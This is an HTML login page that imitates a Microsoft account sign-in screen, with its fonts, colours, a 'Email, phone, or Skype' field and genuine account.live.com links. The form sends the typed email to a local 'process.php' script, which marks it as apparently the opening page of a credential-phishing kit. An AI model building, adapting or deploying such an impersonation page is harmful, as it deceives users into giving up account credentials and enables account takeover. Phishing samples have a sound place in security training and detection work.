<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <title>Sign in to your account</title> 
    <style>
        body {
            font-family: "Segoe UI", "Helvetica Neue", "Lucida Grande", "Roboto", "Ebrima", "Nirmala UI", "Gadugi";
            font-size: 15px;
            line-height: 20px;
            background: url(d) no-repeat fixed center;
            background-size: cover;
            margin: 0;
            display: flex;
            align-items: center;
            justify-content: center;
            height: 100vh;
        }
        a {
            color: #0067b8;
            text-decoration: none;
            font-size: .8125rem;
        }
        .overlay {
            background-color: #101010;
            opacity: .1;
            position: fixed;
            top: 0;
            left: 0;
            height: 100vh;
            width: 100vw;
            z-index: 0;
        }
        .footer {
            background-color: rgba(20,20,20, 0.6);
            position: fixed;
            bottom: 0;
            height: 28px;
            width: 100vw;
            z-index: 0;
            text-align: center;
            color: white;
            font-size: 12px;
        }
        .sign-in-box {
            max-width: 360px;
            width: 90%;
            padding: 40px;
            background-color: #fff;
            box-shadow: 0 2px 6px rgba(0,0,0,.2);
            min-width: 280px;
            min-height: 250px;
            border-radius: 8px;
        }
        .logo {
            margin-bottom: 10px;
            text-align: left;
        }
        .logo_image {
            height: 40px;
        }
        .display_name {
            font-size: 1.5rem;
            font-weight: 600;
            text-align: left;
            margin-bottom: 15px;
        }
        .input-container {
            position: relative;
            margin-bottom: 20px;
        }
        .emailinput {
            width: 100%;
            padding: 8px 0;
            border: none;
            border-bottom: 1px solid rgba(0,0,0,.6);
            font-size: 1rem;
            background: none;
            outline: none;
        }
        .emailinput:focus {
            border-bottom: 2px solid #0067b8;
        }
        .buttoncontainer {
            text-align: right;
            margin-top: 20px;
        }
        .button {
            color: #fff;
            background-color: #0067b8;
            border: none;
            padding: 10px 16px;
            font-size: 14px;
            cursor: pointer;
            border-radius: 4px;
        }
        .button:hover {
            background-color: #0055a6;
        }
    </style>
</head>
<body>

    <div class="sign-in-box">
        <div class="logo">
            <img id="logo_image" class="logo_image" src="logo.jpg" alt="Logo">
        </div>

        <div class="display_name">Sign in</div>

        <form action="process.php" method="post">
            <div class="input-container">
                <input class="emailinput" id="email" name="email" type="email" autocomplete="off" placeholder="Email, phone, or Skype" required>
            </div>
            <div class="buttoncontainer">
                <input type="submit" class="button" value="Next">
            </div>
        </form>

        <p><a href="https://account.live.com/ResetPassword.aspx">Sign in another way</a></p>
        <p><a href="https://account.live.com/ResetPassword.aspx">More information</a></p>
    </div>

    <div class="footer">
        Terms of use &nbsp; | &nbsp; Privacy & Cookies
    </div>

</body> 
</html>
